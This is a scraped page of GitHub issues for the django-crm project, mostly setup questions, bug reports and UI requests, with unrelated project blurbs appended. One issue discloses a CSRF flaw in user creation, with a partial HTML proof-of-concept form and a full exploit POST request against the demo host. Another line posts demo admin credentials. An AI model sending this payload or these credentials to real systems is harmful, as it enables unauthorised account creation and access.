micropyramid / django-crm Goto Github PK
View Code? Open in Web Editor NEWOpen Source CRM based on Django
Home Page: https://bottlecrm.io
License: MIT License
Open Source CRM based on Django
Home Page: https://bottlecrm.io
License: MIT License
Hello, I am get source Django-CRM. Start server by "python manage.py runserver", open login page to CRM , but I dont know how to add my account data in to. Can you tell me how to add account date to the CRM?
There is already a quite far developed django based crm.
I would appreciate when we could start to work together on the same project.
Let us discuss by email [email protected]
For example USer creation form has no csrf token validation, so that attacker can create own account by sending malicious link
POC :
<tr><td>last_name</td><td><input type="text" value="abuthahir++" name="last_name"></td></tr>
<tr><td>username</td><td><input type="text" value="abu" name="username"></td></tr>
<tr><td>email</td><td><input type="text" value="[email protected]" name="email"></td></tr>
<tr><td>role</td><td><input type="text" value="" name="role"></td></tr>
<tr><td>password</td><td><input type="text" value="reset!23" name="password"></td></tr>
</table><input type="submit" value="http://django-crm.micropyramid.com/users/create/"></form></html>```
EXPLOIT REQUEST:
POST /users/create/ HTTP/1.1
Host: django-crm.micropyramid.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-crm.micropyramid.com/users/create/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Cookie: sessionid=g8up9d4xvqga5rwk1m7f4e4mhxmy111
Connection: close
Upgrade-Insecure-Requests: 1
first_name=syed&last_name=abuthahir++&username=abu&email=test%40gmail.com&role=&password=reset%2123
You have a security issue, the crm list users without the need for a login
canceling the edit profil ( https://django-crm.micropyramid.com/users/1/edit/ ) return 404 , i don't get it why ?!! the save too
You have the email and planner apps commented out in the main crm/urls.py. Is this intentional as you are still developing this CRM? Are you planning to add documentation on how to enable these features at http://django-crm.readthedocs.io ? These features/documentation would be very helpful!
# url(r'^emails/', include('emails.urls', namespace='emails')),
# url(r'^planner/', include('planner.urls', namespace='planner')),
admins not able to change password. Change password page should ask user to enter current password, new password, confirm password details.
Search should be done with single character too
There is no need of the labels for address like city, state. Just display the address with the given details in a single line seperated by comma
Dont Display comment box if user dont have permission to create comment for the account in account view page
When we enter which is not there in the database, it should return User with email id not exists error message
Show open closed leads, accounts, contacts, campaigns
Now the page is redirecting to profile page
trying to start your crm but gets into problems
Exception Type: FilterError
Exception Value: /bin/sh: 1: sass: not found
I am wondering if there is a dependicy missing?
Now Admins can able to change user email address. Email address should not be editable.
Credentials to CRM Dashboard:
Email: [email protected] Password: admin
Not working on https://django-crm.micropyramid.com/login/?next=/
Add Custom 404 & 500 pages.
In leads list page
Pagination design broken
Fix it in the following list pages.
"P" should be capital in the "Forgot Password" text
in all update pages we are getting text as "create" in the bread crumb
Now user can able to create duplicate contacts. Those should be unique.
Getting error as "403 Forbidden"
The name "oppurtunity" should be changed to "opportunity", throughout the project
But now the page is redirecting to list page
Unable to apply CachedCompilerFilter (sass --scss {infile} {outfile})
Could not find an option named "scss".
Usage: sass [output]
COMPRESS_PRECOMPILERS = (
('text/less', 'lessc {infile} {outfile}'),
('text/x-sass', 'sass {infile} {outfile}'),
('text/x-scss', 'sass --scss {infile} {outfile}'),
)
I removed the -css on settings and work.
What is wrong?
After creating a superuser and logging in, I do not see the tab with 'Users'.
Any idea?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.